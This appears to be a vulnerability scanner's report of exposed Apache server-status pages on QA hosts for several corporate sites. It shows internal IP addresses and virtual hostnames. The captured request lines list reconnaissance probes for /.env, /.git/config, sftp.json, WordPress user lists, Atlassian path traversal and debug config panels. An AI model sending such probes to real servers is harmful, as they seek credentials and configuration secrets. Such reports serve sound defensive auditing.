13-0135070/0/149R 0.00574085980.00.001.24 10.253.106.141http/1.1 14-01363717/17/166K 0.0225357855.10.051.09 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /login.action HTTP/1.1 15-0145404/4/149K 0.000357117.60.014.18 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /server-status HTTP/1.1 16-0101570/7/178R 0.015331497170.00.0614.27 10.253.106.215http/1.1 17-0139603/6/123K 0.002785163.10.011.47 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /.env HTTP/1.1 18-0130800/1/171R 0.00256124155790.00.022.37 10.253.106.141http/1.1 19-0120780/5/155R 0.015133120930.00.832.81 10.253.106.141http/1.1 20-098243/15/103K 0.012048203.40.061.78 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 21-0130811/3/134K 0.0033831420.70.011.40 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 22-0116975/9/114W 0.010072344.10.060.67 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /server-status HTTP/1.1 23-0140240/0/122R 0.007970102190.00.001.48 10.253.106.141http/1.1 24-0139610/0/146R 0.00497051050.00.005.36 10.253.106.141http/1.1 25-0136380/0/105R 0.00834050960.00.002.54 10.253.106.215http/1.1 26-0145414/4/81K 0.00068464.70.000.40 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /.DS_Store HTTP/1.1 27-0145424/4/183K 0.0006183123.90.002.61 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /.DS_Store HTTP/1.1 28-0139631/2/153K 0.00340183500.80.003.22 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /telescope/requests HTTP/1.1 29-0145431/1/161K 0.0037137180.70.00203.31 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /.env HTTP/1.1 30-01308516/17/102K 0.02338322059.20.061.15 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.env HTTP/1.1 31-0145440/0/114R 0.006017200.00.001.02 10.253.106.215http/1.1 32-0145456/7/159K 0.0025168684.60.011.80 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /.vscode/sftp.json HTTP/1.1 33-090633/36/150K 0.0333861272.30.200.98 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 34-0130870/0/117R 0.008380138960.00.001.46 10.253.106.141http/1.1 35-0140250/0/190R 0.007970147040.00.004.24 10.253.106.215http/1.1 36-0140260/0/121R 0.00780029700.00.0020.89 10.253.106.215http/1.1 37-0139641/10/105K 0.013094571.00.03194.55 10.253.106.215http/1.1qa1.onelambda.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 38-0132801/3/106K 0.0033824060.70.001.22 10.253.106.215http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 39-0140270/0/115R 0.00780031160.00.001.38 10.253.106.215http/1.1 40-0139656/7/242K 0.2134094128.90.401.70 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 41-0132824/11/146K 0.012360837.70.012.13 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /server-status HTTP/1.1 42-0139669/10/142K 0.0001253759.70.011.59 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /debug/default/view?panel=config HTTP/1.1 43-0132835/8/210W 0.010070795.40.045.08 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /s/3333e2738313e26313e223/_/;/META-INF/maven/com.atlassian. 44-0145465/10/170K 0.012665278.60.029.77 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /login.action HTTP/1.1 45-0139681/1/141K 0.00312187361.30.001.83 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /debug/default/view?panel=config HTTP/1.1 46-0145474/4/168K 0.0001441314.80.002.21 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /s/3333e2738313e26313e223/_/;/META-INF/maven/com.atlassian. 47-0145482/2/109W 0.000028882.60.000.72 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /info.php HTTP/1.1 48-0118877/39/134K 0.22302280510.50.841.08 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /?rest_route=/wp/v2/users/ HTTP/1.1 49-0139691/1/89K 0.003056491.10.000.77 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 50-0139702/5/103K 0.000934362.10.000.24 10.253.106.141http/1.1qa1-corporate.thermofisher.com:GET /api/search?folderIds=0 HTTP/1.1 51-0139710/0/87R
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c3b036613
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 14-Apr-2023 16:46:44 EDT Restart Time: Thursday, 13-Apr-2023 11:25:25 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 5 hours 21 minutes 18 seconds Server load: 0.06 0.02 0.00 Total accesses: 31514 - Total Traffic: 623.3 MB - Total Duration: 573508 CPU Usage: u7.15 s13.12 cu34.85 cs7.75 - .0595% CPU load .298 requests/sec - 6.0 kB/second - 20.3 kB/request - 18.1985 ms/request 66 requests currently being processed, 0 idle workers KKKRRRKRRRKRRRWKRKRRKKKRRRKKKKKRKKRRRKKRKKKKRKKRKKKRRRKRRRKRRRW. ..RRR........................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0103081/33/165K 0.0504037990.80.200.87 10.253.106.215http/1.1qa1.onelambda.com:80GET /debug/default/view?panel=config HTTP/1.1 1-0383810568/10568/10568K 4.9850496815966.415.5915.59 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 2-0383910568/10568/10568K 6.1950611015966.315.5915.59 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0134500/0/196R 0.00530082210.00.002.48 10.253.106.141http/1.1 4-0136360/1/169R 0.00835057860.00.001.95 10.253.106.215http/1.1 5-0134510/10/325R 0.002530111870.00.430.92 10.253.106.141http/1.1 6-0130771/14/140K 0.010624810.70.052.13 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /.vscode/sftp.json HTTP/1.1 7-0128580/6/134R 0.00571023960.00.011.33 10.253.106.215http/1.1 8-0140220/0/129R 0.00815041440.00.002.57 10.253.106.215http/1.1 9-0132680/1/199R 0.00253141124480.00.013.42 10.253.106.141http/1.1 10-0145381/1/145K 0.000349484.50.001.15 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 11-0134520/6/129R 0.00510040440.01.292.74 10.253.106.141http/1.1 12-0140230/0/120R 0.00794033270.00.001.09 10.253.106.141http/1.1 13-0135070/0/149R 0.00571085980.00.001.24 10.253.106.141http/1.1 14-01363712/12/161W 0.0200345150.20.051.08 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /.DS_Store HTTP/1.1 15-0145403/3/148K 0.0001057032.80.004.18 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /about HTTP/1.1 16-0101570/7/178R 0.015301497170.00.0614.27 10.253.106.215http/1.1 17-0139602/5/122K 0.000985022.40.011.46 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /debug/default/view?panel=config HTTP/1.1 18-0130800/1/171R 0.00253124155790.00.022.37 10.253.106.141http/1.1 19-0120780/5/155R 0.015103120930.00.832.81 10.253.106.141http/1.1 20-098242/14/102K 0.0101048202.30.061.78 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /info.php HTTP/1.1 21-0130811/3/134K 0.0003831420.70.011.40 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 22-0116974/8/113K 0.010072213.40.060.67 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 23-0140240/0/122R 0.007940102190.00.001.48 10.253.106.141http/1.1 24-0139610/0/146R 0.00494051050.00.005.36 10.253.106.141http/1.1 25-0136380/0/105R 0.00831050960.00.002.54 10.253.106.215http/1.1 26-0145411/1/78K 0.000117951.50.000.39 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 27-0145423/3/182K 0.0006183003.20.002.61 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /login.action HTTP/1.1 28-0139631/2/153K 0.00040183500.80.003.22 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /telescope/requests HTTP/1.1 29-0145431/1/161K 0.0007137180.70.00203.31 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /.env HTTP/1.1 30-01308516/17/102K 0.02038322059.20.061.15 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.env HTTP/1.1 31-0145440/0/114R 0.003017200.00.001.02 10.253.106.215http/1.1 32-0145455/6/158K 0.0007168563.90.001.80 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /.env HTTP/1.1 33-090633/36/150K 0.0303861272.30.200.98 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 34-0130870/0/117R 0.008350138960.00.001.46 10.253.106.141http/1.1 35-0140250/0/190R 0.007940147040.00.004.24 10.253.106.215http/1.1 36-0140260/0/121R 0.00777029700.00.0020.89 10.253.106.215http/1.1 37-0139641/10/105K 0.010094571.00.03194.55 10.253.106.215http/1.1qa1.onelambda.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 38-0132801/3/106K 0.0003824060.70.001.22 10.253.106.215http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 39-0140270/0/115R 0.00777031160.00.001.38 10.253.106.215http/1.1 40-0139656/7/242K 0.2104094128.90.401.70 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 41-0132823/10/145K 0.000960763.10.012.13 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /telescope/requests HTTP/1.1 42-0139667/8/140K 0.0001153507.30.011.58 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /config.json HTTP/1.1 43-0132832/5/207K 0.0104070231.50.045.08 10.253.106.215http/1.1qa1.onelambda.com:80GET /login.action HTTP/1.1 44-0145460/5/165R 0.000563830.00.019.76 10.253.106.141http/1.1 45-0139681/1/141K 0.00012187361.30.001.83 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /debug/default/view?panel=config HTTP/1.1 46-0145473/3/167K 0.0001041023.10.002.21 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /api/search?folderIds=0 HTTP/1.1 47-0145480/0/107R 0.002028370.00.000.72 10.253.106.215http/1.1 48-0118877/39/134K 0.22002280510.50.841.08 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /?rest_route=/wp/v2/users/ HTTP/1.1 49-0139691/1/89K 0.000056491.10.000.77 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 50-0139702/2/100K 0.0003933341.60.000.24 10.253.106.215http/1.1qa1.onelambda.com:80GET /about HTTP/1.1 51-0139710/0/87R 0.00978055920.00.005.78 10.253.106.141http/1.1 52-0139720/0/140R
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c418533f7
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 16-Mar-2023 07:20:17 EDT Restart Time: Wednesday, 15-Mar-2023 17:19:06 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 14 hours 1 minute 11 seconds Server load: 0.00 0.00 0.00 Total accesses: 14052 - Total Traffic: 115.1 MB - Total Duration: 287076 CPU Usage: u3.7 s6.68 cu20.89 cs2.54 - .067% CPU load .278 requests/sec - 2392 B/second - 8.4 kB/request - 20.4295 ms/request 61 requests currently being processed, 15 idle workers .R..KRKK.KRRR.KWK_RKWKK_KW_KRK_WKRRRKR.KKWRRK_RRWRWRRRRRR_R_RRR_ __KRRK_KRRK_RR__W_.............................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0-0/0/91. 0.0058068020.00.002.12 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 1-099570/20/66R 0.04604082490.00.150.93 10.253.106.224http/1.1 2-0-0/0/77. 0.0028092420.00.001.34 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 3-0-0/0/78. 0.0029037680.00.002.72 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 4-016225047/5047/5047K 2.859029307617.87.447.44 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 5-0150910/23/52R 0.0597016712020.00.260.36 10.253.106.249http/1.1 6-0205911/1/75K 0.0004415850.70.000.91 10.253.106.249http/1.1qa1.onelambda.com:80GET /info.php HTTP/1.1 7-016255047/5047/5047K 2.882029567618.77.447.44 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 8-0-0/0/56. 0.005908020.00.000.18 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 9-0180404/20/56K 0.0692020624.10.821.40 10.253.106.249http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 10-0166760/12/54R 0.20909022020.00.771.95 10.253.106.249http/1.1 11-0180410/1/47R 0.00666837500.00.001.49 10.253.106.224http/1.1 12-0180420/0/121R 0.006660486950.00.004.30 10.253.106.224http/1.1 13-0-0/0/66. 0.0060016430.00.001.19 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 14-0205923/3/38K 0.0004114302.30.000.56 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 15-0205933/3/69W 0.000012472.20.000.92 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 16-0205941/1/79K 0.000057091.10.000.87 10.253.106.249http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 17-0206420/2/47_ 0.0004330510.00.002.41 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 18-0167250/2/56R 0.00666018600.00.011.42 10.253.106.224http/1.1 19-0136623/6/47K 0.0066206158355.50.060.93 10.253.106.224http/1.1www-qa.patheon.com:80GET /us/en/home2.html?at_preview_token=YB7l-F-q8CWNxAl21L6Zog&a 20-0206432/2/34W 0.000047475.00.000.26 10.253.106.249http/1.1qa1.onelambda.com:80GET /s/3333e2738313e26313e223/_/;/META-INF/maven/com.atlassian. 21-0206441/1/50K 0.0004320250.80.001.84 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 22-0183301/1/60K 0.00678150119.20.020.54 10.253.106.224http/1.1www-qa.patheon.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-base/ 23-0206460/1/43_ 0.000020960.00.000.40 10.253.106.249http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 24-0206471/1/65K 0.0004414830.80.000.92 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /telescope/requests HTTP/1.1 25-0206480/0/54W 0.000056810.00.000.50 10.253.106.249http/1.1qa1.onelambda.com:80GET /.vscode/sftp.json HTTP/1.1 26-0206490/1/65_ 0.000028480.00.001.16 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 27-0206501/1/53K 0.000089381.00.001.44 10.253.106.249http/1.1qa1.onelambda.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 28-0116190/3/34R 0.0097004160.00.000.09 10.253.106.249http/1.1 29-01931261/62/111K 0.060419072138.20.141.17 10.253.106.249http/1.1qa1.onelambda.com:80GET /.DS_Store HTTP/1.1 30-0167320/12/81_ 0.010035020.00.091.30 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 31-0167337/28/81W 0.150066446.70.542.24 10.253.106.249http/1.1qa1.onelambda.com:80GET /telescope/requests HTTP/1.1 32-0154412/4/36K 0.0067862339.50.040.20 10.253.106.224http/1.1www-qa.patheon.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-base/ 33-0193130/2/61R 0.18866470480.00.411.07 10.253.106.249http/1.1 34-0193140/2/47R 0.00866348210.00.001.03 10.253.106.249http/1.1 35-0193150/0/67R 0.00866014000.00.000.64 10.253.106.249http/1.1 36-0206511/1/56K 0.000095091.10.000.69 10.253.106.249http/1.1qa1.onelambda.com:80GET / HTTP/1.1 37-0206520/0/82R 0.0064042870.00.001.73 10.253.106.249http/1.1 38-0-0/0/76. 0.0061033450.00.002.21 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 39-0206531/1/31K 0.00083110.70.000.12 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.DS_Store HTTP/1.1 40-0206541/1/39K 0.000312764.30.000.54 10.253.106.249http/1.1qa1.onelambda.com:80GET /server-status HTTP/1.1 41-0206550/0/76W 0.000048140.00.002.75 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.env HTTP/1.1 42-0193160/0/34R 0.00866010200.00.000.97 10.253.106.249http/1.1 43-0193170/4/50R 0.00861321020.00.010.72 10.253.106.249http/1.1 44-0193181/1/50K 0.00671711221390.60.091.19 10.253.106.224http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 45-0116280/23/48_ 0.023108950.00.100.45 10.253.106.249http/1.1 46-0193190/0/15R 0.0086603870.00.000.03 10.253.106.249http/1.1 47-0206560/0/74R 0.0064053790.00.001.41 10.253.106.249http/1.1 48-0206570/0/25W 0.00002270.00.000.04 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 49-0193200/0/25R 0.0086601310.00.000.07 10.253.106.249http/1.1 50-0206580/0/47W 0.000052170.00.000.82 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 51-0193210/0/34R 0.00861020950.00.000.35 10.253.106.249http/1.1 52-0206590
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c2ccf0ba1
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 06-Mar-2023 03:37:19 EST Restart Time: Friday, 03-Mar-2023 12:12:25 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 days 15 hours 24 minutes 54 seconds Server load: 0.05 0.01 0.00 Total accesses: 63939 - Total Traffic: 396.8 MB - Total Duration: 1370062 CPU Usage: u15.47 s27.59 cu62.16 cs11.68 - .0512% CPU load .28 requests/sec - 1822 B/second - 6.4 kB/request - 21.4276 ms/request 56 requests currently being processed, 21 idle workers RKKK_KK__RKRKKRKWRK_RKRKR_RRRRRRRRRRR_K_R_K_R_RR_RKRR____R_K_KKR KKRRKKK_RR___................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0185250/0/295R 0.005640159620.00.005.57 10.253.106.224http/1.1 1-0174444/5/314K 0.00040226853.60.005.29 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 2-0233583/3/387K 0.00040185922.30.004.45 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 3-01968222830/22830/22830K 12.93201327534574.933.7633.76 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 4-064040/6/261_ 0.0120217070.00.094.86 10.253.106.249http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 5-01968422829/22829/22829K 13.07401344534573.633.7633.76 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 6-0233593/3/286K 0.0000174033.00.004.37 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 7-0149550/9/328_ 0.001510205400.00.013.71 10.253.106.249http/1.1 8-0159460/12/243_ 0.01159186690.00.275.04 10.253.106.249http/1.1 9-0201220/5/371R 0.002950182220.00.016.00 10.253.106.249http/1.1 10-0103553/15/304K 0.0700193832.50.294.61 10.253.106.249http/1.1qa1.onelambda.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 11-0159470/1/273R 0.0056940377150.00.005.90 10.253.106.249http/1.1 12-0233602/2/262K 0.0000157851.90.006.11 10.253.106.249http/1.1qa1.onelambda.com:80GET / HTTP/1.1 13-0220353/15/252K 0.38010137643.70.965.88 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 14-051340/25/317R 0.0456453179310.00.634.48 10.253.106.249http/1.1 15-0233614/4/308K 0.00042224433.00.002.52 10.253.106.249http/1.1qa1.onelambda.com:80GET /.vscode/sftp.json HTTP/1.1 16-0224944/4/239W 0.0000190372.90.004.37 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 17-0130130/7/270R 0.0855662181540.00.203.52 10.253.106.224http/1.1 18-0233624/4/370K 0.00040236723.20.007.35 10.253.106.249http/1.1qa1.onelambda.com:80GET /s/5343e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 19-0141580/18/364_ 0.01210767270.00.117.46 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 20-0224950/0/225R 0.002580231340.00.003.38 10.253.106.249http/1.1 21-0201261/10/262K 0.0002169134.50.025.99 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 22-0201270/1/326R 0.00563159299400.00.095.54 10.253.106.249http/1.1 23-0233634/4/242K 0.00038125873.00.004.95 10.253.106.249http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 24-0201280/0/224R 0.005630126800.00.003.14 10.253.106.249http/1.1 25-0233640/4/230_ 0.00040139740.00.003.88 10.253.106.249http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 26-0176190/15/238R 0.18393165154730.00.724.36 10.253.106.224http/1.1 27-048340/8/266R 0.012580153680.00.185.09 10.253.106.249http/1.1 28-0233650/0/284R 0.00190489040.00.006.20 10.253.106.249http/1.1 29-0130150/17/229R 0.16563187127120.00.533.92 10.253.106.224http/1.1 30-0233660/0/281R 0.00190190930.00.004.42 10.253.106.249http/1.1 31-0177860/3/228R 0.0056440131240.00.003.28 10.253.106.224http/1.1 32-0130160/5/180R 0.20563252189540.00.433.85 10.253.106.224http/1.1 33-0201290/9/248R 0.1852159132280.00.533.81 10.253.106.249http/1.1 34-0177880/9/305R 0.10521352225400.00.245.85 10.253.106.224http/1.1 35-0159530/4/260R 0.002590112740.00.093.98 10.253.106.249http/1.1 36-0201300/1/333R 0.0055552242270.00.006.06 10.253.106.224http/1.1 37-0233670/0/216_ 0.00190137800.00.003.03 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 38-0233681/1/207K 0.0003119784.60.002.62 10.253.106.249http/1.1qa1.onelambda.com:80GET /server-status HTTP/1.1 39-0104770/20/203_ 0.01040125790.00.303.66 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 40-0121750/14/368R 0.1952280401030.00.654.47 10.253.106.224http/1.1 41-0233690/0/212_ 0.00190136990.00.004.13 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 42-0225037/7/207K 0.00042120356.20.014.46 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /s/3353e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 43-0159970/25/312_ 0.35025267660.00.947.23 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 44-0141670/8/241R 0.00563207235770.00.214.88 10.253.106.249http/1.1 45-0233700/0/197_ 0.00190170910.00.002.28 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 46-033370/23/276R 0.02569134163080.00.304.68 10.253.106.224http/1.1 47-0201320/0/234R 0.005400188020.00.003.85 10.253.106.224http/1.1 48-0141690/7/190_ 0.00154184600.00.114.01 10.253.106.249http/1.1 49-0201330/0/217R 0.005550118040.00.002.48 10.253.106.224http/1.1 50-0225048/8/267K 0.000401900310.90.014.37 10.253.106.249http/1.1qa1.onelambda.com:80GET /info.php HTTP/1.1 51-0201340/0/334R 0.005560194280.00.005.92 10.253.106.224http/1.1 52-0201350/8/217R 0.0352154160970.00.114.83 10.253.106.249http/1.1 53-0233710/0/199_ 0.00190174490.00.004.07 127.0.0.1http/1.1qa1-corporate.thermofisher.com:
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c16c6f316
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 06-Mar-2023 03:37:17 EST Restart Time: Friday, 03-Mar-2023 12:12:25 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 days 15 hours 24 minutes 51 seconds Server load: 0.05 0.01 0.00 Total accesses: 63858 - Total Traffic: 396.7 MB - Total Duration: 1366061 CPU Usage: u15.46 s27.59 cu62.16 cs11.68 - .0512% CPU load .28 requests/sec - 1822 B/second - 6.4 kB/request - 21.3922 ms/request 44 requests currently being processed, 26 idle workers R__KRK___R_R_KR_RR_KR_R_R_RR_R_RRRRRR__RR_K_R_RR_RWRR__..R.R.K_R RRRRK___RR...................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0185250/0/295R 0.005610159620.00.005.57 10.253.106.224http/1.1 1-0174440/1/310_ 0.00310224220.00.005.28 10.253.106.224http/1.1 2-0233580/0/384_ 0.00190183470.00.004.45 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 3-01968222829/22829/22829K 12.93901327534573.333.7633.76 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 4-064040/4/259R 0.01256139217070.00.094.86 10.253.106.249http/1.1 5-01968422829/22829/22829K 13.07201344534573.633.7633.76 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 6-0233590/0/283_ 0.00180173210.00.004.37 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 7-0149550/9/328_ 0.001310205400.00.013.71 10.253.106.249http/1.1 8-0159460/12/243_ 0.01139186690.00.275.04 10.253.106.249http/1.1 9-0201220/5/371R 0.002920182220.00.016.00 10.253.106.249http/1.1 10-0103550/12/301_ 0.0731130192880.00.294.61 10.253.106.224http/1.1 11-0159470/1/273R 0.0056640377150.00.005.90 10.253.106.249http/1.1 12-0233600/0/260_ 0.00180157020.00.006.11 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 13-0220351/13/250K 0.38180137191.00.955.88 10.253.106.224http/1.1qa1.onelambda.com:80GET /en/home.html HTTP/1.1 14-051340/25/317R 0.0456153179310.00.634.48 10.253.106.249http/1.1 15-0233610/0/304_ 0.00170221370.00.002.52 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 16-0224940/0/235R 0.002560187850.00.004.37 10.253.106.249http/1.1 17-0130130/7/270R 0.0855362181540.00.203.52 10.253.106.224http/1.1 18-0233620/0/366_ 0.00170233470.00.007.35 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 19-01415813/17/363K 0.010107672713.80.107.45 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 20-0224950/0/225R 0.002560231340.00.003.38 10.253.106.249http/1.1 21-0201260/9/261_ 0.001927169070.00.015.98 